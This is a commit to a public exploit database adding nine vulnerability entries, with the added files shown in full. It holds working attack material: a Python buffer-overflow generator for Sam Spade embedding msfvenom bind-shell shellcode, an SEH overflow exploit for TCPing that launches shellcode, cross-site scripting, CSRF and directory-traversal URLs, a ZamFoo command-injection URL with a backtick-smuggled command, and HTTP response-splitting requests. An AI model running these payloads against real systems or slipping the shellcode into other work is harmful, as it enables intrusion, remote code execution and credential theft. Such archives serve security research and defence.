DB: 2015-11-03

9 new exploits
2015-11-03 05:02:32 +00:00 · 2015-11-03 05:02:32 +00:00 · ba3336243c
commit ba3336243c
parent c559949c05
10 changed files with 438 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34854,6 +34854,7 @@ id,file,description,date,author,platform,type,port
 38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection Vulnerabilities",2015-10-30,"Curesec Research Team",php,webapps,0
 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0
+38580,platforms/windows/dos/38580.txt,"Windows NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0
 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
 38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0
@ -34867,3 +34868,11 @@ id,file,description,date,author,platform,type,port
 38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server 'tplink-enum.py' Security Bypass Vulnerability",2013-06-19,SANTHO,hardware,remote,0
 38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component Arbitrary File Upload Vulnerability",2013-06-19,Am!r,php,webapps,0
 38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection Vulnerability",2013-06-24,Chako,cgi,webapps,0
+38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie 'get_file.php' Directory Traversal Vulnerability",2013-06-25,prairie,php,webapps,0
+38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox <= 4.0 'tracepath' Local Denial of Service Vulnerability",2013-06-26,"Thomas Dreibholz",multiple,dos,0
+38596,platforms/php/webapps/38596.txt,"Xaraya Multiple Cross Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0
+38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0
+38598,platforms/php/webapps/38598.txt,"ZamFoo 'date' Parameter Remote Command Injection Vulnerability",2013-06-15,localhost.re,php,webapps,0
+38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow Exploit",2015-11-02,VIKRAMADITYA,windows,local,0
+38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0
+38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0
--- a/platforms/multiple/dos/38595.txt
+++ b/platforms/multiple/dos/38595.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60794/info
+
+Oracle VM VirtualBox is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the host system's network to become unusable, resulting in denial-of-service condition.
+
+VirtualBox 4.2.12 is affected; other versions may also be vulnerable. 
+
+tracepath 8.8.8.8 
--- a/platforms/multiple/remote/38597.txt
+++ b/platforms/multiple/remote/38597.txt
@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/60818/info
+
+Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible.
+
+Motion 3.2.12 is vulnerable; other versions may also be affected. 
+
+Buffer-overflow:
+
+# motion -c `python -c 'print "\x41"*1000'`
+[0] Configfile
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAA
+not fou:
+Segmentation fault
+
+
+# motion -p /tmp/`python -c 'print "\x41"*5000'`
+Segmentation fault
+
+Cross-site scripting:
+
+http://www.example.com
+<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>
+
+Cross-site request forgery:
+
+http://www.example.com/0/config/set?control_authentication=admin:mypassword
+(Set admin password)
+http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary 
+SQL
+query)
--- a/platforms/php/webapps/38594.txt
+++ b/platforms/php/webapps/38594.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60782/info
+
+Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks. 
+
+http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png 
--- a/platforms/php/webapps/38596.txt
+++ b/platforms/php/webapps/38596.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/60795/info
+
+Xaraya is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xaraya 2.4.0-b1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?func=modinfonew&id=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=modules&type=admin
+
+http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=blocks&tab=config&type=admin
+
+http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin
+
+http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3 
--- a/platforms/php/webapps/38598.txt
+++ b/platforms/php/webapps/38598.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60826/info
+
+ZamFoo is prone to a remote command-injection vulnerability.
+
+Attackers can exploit this issue to execute arbitrary commands in the context of the application.
+
+ZamFoo 12.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command` 
--- a/platforms/windows/dos/38580.txt
+++ b/platforms/windows/dos/38580.txt
@ -0,0 +1,47 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=483
+
+Windows: NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege
+Platform: Windows 8.1 Update, Windows 10, Windows Server 2012
+Class: Local Dos/Elevation of Privilege
+
+Summary:
+The NtCreateLowBoxToken API allows the capture of arbitrary handles which can lead to to local DoS or elevation of privilege. 
+
+Description:
+
+The NtCreateLowBoxToken system call accepts an array of handles which are stored with the new token. This is presumably for maintaining references to the appcontainer specific object directories and symbolic links so that they do not need to be maintained anywhere else. The function, SepReferenceLowBoxObjects which captures the handles has a couple of issues which can lead to abuse:
+
+1) It calls ZwDuplicateObject which means the API can capture kernel handles as well as user handles. 
+2) No checks are made on what object types the handles represent. 
+
+The fact that kernel handles can be captured isn’t as bad as it could be. As far as I can tell there’s no way of getting the handles back. The second issue though is slightly more serious as it allows a user to create a reference cycle to kernel objects and potentially maintain them indefinitely, at least until a reboot. 
+
+One way of doing this is to exploit the fact that threads can be assigned impersonation tokens. For example a new thread can be created and the handle to that thread captured inside the lowbox handle table. The resulting lowbox token can then be assigned as an impersonation token, the thread and token now maintain their references and the kernel objects survive the user logging out. As the thread references the process this also maintains the process object. 
+
+Now at the point of logging out the process will be terminated but because the token maintains the reference cycle the process object itself will not go away. This can lead to a few results:
+
+1) A user could open handles to important resources and files and prevent the handles getting released. This could ultimately result in a local DoS (although only something like a terminal server would be affected) and the administrator wouldn’t easily be able to fix it without rebooting as the process becomes hidden from typical task managers and trying to terminate it won’t help. 
+2) If a user logs out then back in again they can reopen the process (by PID or using NtGetNextProcess) and get access to the original process token which is still marked as having the original session ID (something which would normally require TCB privilege to change). This might be exploitable to elevate privileges in some scenarios.
+
+While the session object still exists in the kernel due to the reference cycle, it is dead so trying to create a process within that session will not work, however the user could release the reference cycle by clearing the thread’s impersonation token which will let session object be cleaned up and allow another user (again think terminal server) to login with that session ID. The user could then create a process in that session indirectly by impersonating the token and using something like the task scheduler. 
+
+It isn’t immediately clear if the user would be able to access the session’s desktop/window station due to its DACL, but at the least references to the sessions object directory could be maintained (such as DosDevices) which might allow the user to redirect named resources for the user to themselves and get the privileges of the other user. This would be particularly serious if the other user was an administrator. 
+
+Proof of Concept:
+
+I’ve provided a PoC which will cause the reference cycle and display the process if it can open one. The archive password is ‘password’. Follow these steps: 
+
+1) Extract the PoC to a location on a local hard disk which is writable by a normal user
+2) Execute the poc executable file
+3) The user should be automatically logged out
+4) Log back in as the user
+5) Execute poc again, it should now print out information about the stuck process and the extracted process token. 
+
+Expected Result:
+It shouldn’t be possible to generate a kernel object reference cycle
+
+Observed Result:
+The reference cycle is created and the user can reopen the process. 
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38580.zip
--- a/platforms/windows/local/38601.py
+++ b/platforms/windows/local/38601.py
@ -0,0 +1,56 @@
+#!/usr/bin/python 
+# -*- coding: cp1252 -*-
+# EXPLOIT TITLE: Sam Spade 1.14 Scan from IP address Field Exploit
+# AUTHOR: VIKRAMADITYA "-OPTIMUS"
+# Credits: Luis Mart<72>nez
+# Date of Testing: 2nd November 2015
+# Download Link : https://www.exploit-db.com/apps/7ad7569341d685b4760ba4adecab6def-spade114.exe
+# Tested On : Windows XP Service Pack 2
+# Steps to Exploit
+# Step 1: Execute this python script
+# Step 2: This script will create a file called buffer.txt
+# Step 3: Copy the contents of buffer.txt file
+# Step 4: Now open Sam Spade 1.14 
+# Step 5: Go To 'Tools' > 'Scan Addresses...' 
+# Step 6: Paste the contents in 'Scan from IP addresses' input field 
+# Step 7: Connect to the target at port 4444 with ncat/nc 
+
+
+
+
+file = open('buffer.txt' , 'wb');
+
+buffer = "A"*507 + "\x9f\x43\x30\x5d"  #JMP ESP 
+buffer += "\x90"*20
+
+# msfvenom  -p windows/shell_bind_tcp -f c -b "\x00\x0a\x0d\x20\x0b\x0c"
+
+buffer += ("\xba\x72\x30\xbb\xe7\xdd\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
+"\x53\x31\x50\x12\x83\xc0\x04\x03\x22\x3e\x59\x12\x3e\xd6\x1f"
+"\xdd\xbe\x27\x40\x57\x5b\x16\x40\x03\x28\x09\x70\x47\x7c\xa6"
+"\xfb\x05\x94\x3d\x89\x81\x9b\xf6\x24\xf4\x92\x07\x14\xc4\xb5"
+"\x8b\x67\x19\x15\xb5\xa7\x6c\x54\xf2\xda\x9d\x04\xab\x91\x30"
+"\xb8\xd8\xec\x88\x33\x92\xe1\x88\xa0\x63\x03\xb8\x77\xff\x5a"
+"\x1a\x76\x2c\xd7\x13\x60\x31\xd2\xea\x1b\x81\xa8\xec\xcd\xdb"
+"\x51\x42\x30\xd4\xa3\x9a\x75\xd3\x5b\xe9\x8f\x27\xe1\xea\x54"
+"\x55\x3d\x7e\x4e\xfd\xb6\xd8\xaa\xff\x1b\xbe\x39\xf3\xd0\xb4"
+"\x65\x10\xe6\x19\x1e\x2c\x63\x9c\xf0\xa4\x37\xbb\xd4\xed\xec"
+"\xa2\x4d\x48\x42\xda\x8d\x33\x3b\x7e\xc6\xde\x28\xf3\x85\xb6"
+"\x9d\x3e\x35\x47\x8a\x49\x46\x75\x15\xe2\xc0\x35\xde\x2c\x17"
+"\x39\xf5\x89\x87\xc4\xf6\xe9\x8e\x02\xa2\xb9\xb8\xa3\xcb\x51"
+"\x38\x4b\x1e\xcf\x30\xea\xf1\xf2\xbd\x4c\xa2\xb2\x6d\x25\xa8"
+"\x3c\x52\x55\xd3\x96\xfb\xfe\x2e\x19\x12\xa3\xa7\xff\x7e\x4b"
+"\xee\xa8\x16\xa9\xd5\x60\x81\xd2\x3f\xd9\x25\x9a\x29\xde\x4a"
+"\x1b\x7c\x48\xdc\x90\x93\x4c\xfd\xa6\xb9\xe4\x6a\x30\x37\x65"
+"\xd9\xa0\x48\xac\x89\x41\xda\x2b\x49\x0f\xc7\xe3\x1e\x58\x39"
+"\xfa\xca\x74\x60\x54\xe8\x84\xf4\x9f\xa8\x52\xc5\x1e\x31\x16"
+"\x71\x05\x21\xee\x7a\x01\x15\xbe\x2c\xdf\xc3\x78\x87\x91\xbd"
+"\xd2\x74\x78\x29\xa2\xb6\xbb\x2f\xab\x92\x4d\xcf\x1a\x4b\x08"
+"\xf0\x93\x1b\x9c\x89\xc9\xbb\x63\x40\x4a\xcb\x29\xc8\xfb\x44"
+"\xf4\x99\xb9\x08\x07\x74\xfd\x34\x84\x7c\x7e\xc3\x94\xf5\x7b"
+"\x8f\x12\xe6\xf1\x80\xf6\x08\xa5\xa1\xd2")
+
+
+
+file.write(buffer);
+file.close()
--- a/platforms/windows/local/38603.py
+++ b/platforms/windows/local/38603.py
@ -0,0 +1,158 @@
+'''
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt
+
+
+Vendor:
+================================
+Spetnik.com
+http://tcping.soft32.com/free-download/
+
+
+Product:
+=================================
+Spetnik TCPing 2.1.0 / tcping.exe
+circa 2007
+
+TCPing "pings" a server on a specific port using TCP/IP by opening and
+closing a
+connection on the specified port. Results are returned in a similar fashion
+to that
+of Microsoft Windows Ping. This application is intended for use in testing
+for open
+ports on remote machines, or as an alternative to the standard "ping" in a
+case
+where ICMP packets are blocked or ignored.
+
+
+Vulnerability Type:
+===================
+Buffer Overflow
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+If TCPing is called with an specially crafted CL argument we will cause
+exception and overwrite
+the Pointers to next SEH record and SEH handler with our buffer and
+malicious shellcode.
+No suitable POP POP RET address is avail in TCPing as they start with null
+bytes 0x00 and will
+break our shellcode. However, TCPing is not compiled with SafeSEH which is
+a linker option, so we
+can grab an address from another module that performs POP POP RET
+instructions to acheive
+arbitrary code execution on victims system.
+
+
+stack dump...
+
+
+EAX 00000045
+ECX 0040A750 tcping.0040A750
+EDX 41414141
+EBX 000002CC
+ESP 0018FA50
+EBP 0018FA50
+ESI 0018FD21 ASCII "rror: Unknown host AAAAAA....
+EDI 0018FCC8
+EIP 0040270A tcping.0040270A
+C 0  ES 002B 32bit 0(FFFFFFFF)
+P 1  CS 0023 32bit 0(FFFFFFFF)
+A 1  SS 002B 32bit 0(FFFFFFFF)
+Z 0  DS 002B 32bit 0(FFFFFFFF)
+S 0  FS 0053 32bit 7EFDD000(FFF)
+T 0  GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0  LastErr WSANO_DATA (00002AFC)
+EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
+
+
+WinDBG dump...
+
+
+(17a8.149c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** WARNING: Unable to verify checksum for image00400000
+*** ERROR: Module load completed but symbols could not be loaded for
+image00400000
+eax=00000045 ebx=00000222 ecx=0040a750 edx=41414141 esi=0018fd21
+edi=0018fcc8
+eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0         nv up ei pl nz ac pe
+nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
+efl=00010216
+image00400000+0x270a:
+0040270a 8802            mov     byte ptr [edx],al
+ ds:002b:41414141=??
+
+
+Exploit code(s):
+===============
+
+Python script...
+'''
+
+import struct,os,subprocess
+
+#Spetnik TCPing Utility 2.1.0
+#buffer overflow SEH exploit
+#by hyp3rlinx
+
+
+#pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+vulnpgm="C:\\tcping.exe "
+
+nseh="\xEB\x06"+"\x90"*2                          #JMP TO OUR SHELLCODE
+
+seh=struct.pack('<L', 0x77214f99)                 #POP POP RET
+
+payload="A"*580+nseh+seh+sc+"\x90"*20             #BOOOOOOOM!
+
+subprocess.Popen([vulnpgm, payload], shell=False)
+
+
+'''
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+=========================================================
+High
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
+'''
--- a/platforms/windows/webapps/38602.txt
+++ b/platforms/windows/webapps/38602.txt
@ -0,0 +1,83 @@
+
+actiTIME 2015.2 Multiple Vulnerabilities
+
+
+Vendor: Actimind, Inc.
+Product web page: http://www.actitime.com
+Affected version: 2015.2 (Small Team Edition)
+
+Summary: actiTIME is a web timesheet software. It allows you to
+enter time spent on different work assignments, register time offs
+and sick leaves, and then create detailed reports covering almost
+any management or accounting needs.
+
+Desc: The application suffers from multiple security vulnerabilities
+including: Open Redirection, HTTP Response Splitting and Unquoted
+Service Path Elevation Of Privilege.
+
+Tested on: OS/Platform:	Windows 7 6.1 for x86
+           Servlet Container: Jetty/5.1.4
+           Servlet API Version: 2.4
+           Java: 1.7.0_76-b13
+           Database: MySQL 5.1.72-community-log
+           Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13
+           Patch level: 28.0
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2015-5273
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php
+
+
+13.10.2015
+
+--
+
+
+
+1. Open Redirect
+-----------------
+
+http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1
+
+
+2. HTTP Response Splitting
+---------------------------
+
+http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1
+
+Response:
+
+HTTP/1.1 302 Moved Temporarily
+Date: Wed, 14 Oct 2015 09:32:05 GMT
+Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76
+Content-Type: text/html;charset=UTF-8
+Cache-Control: no-store, no-cache
+Pragma: no-cache
+Expires: Tue, 09 Sep 2014 09:32:05 GMT
+X-UA-Compatible: IE=Edge
+Location: http://localhost/administration/
+Server: Waddup/2.0
+Content-Length: 0
+
+
+3. Unquoted Service Path Elevation Of Privilege
+------------------------------------------------
+
+C:\Users\joxy>sc qc actiTIME
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: actiTIME
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : actiTIME Server
+        DEPENDENCIES       : actiTIME MySQL
+        SERVICE_START_NAME : LocalSystem
+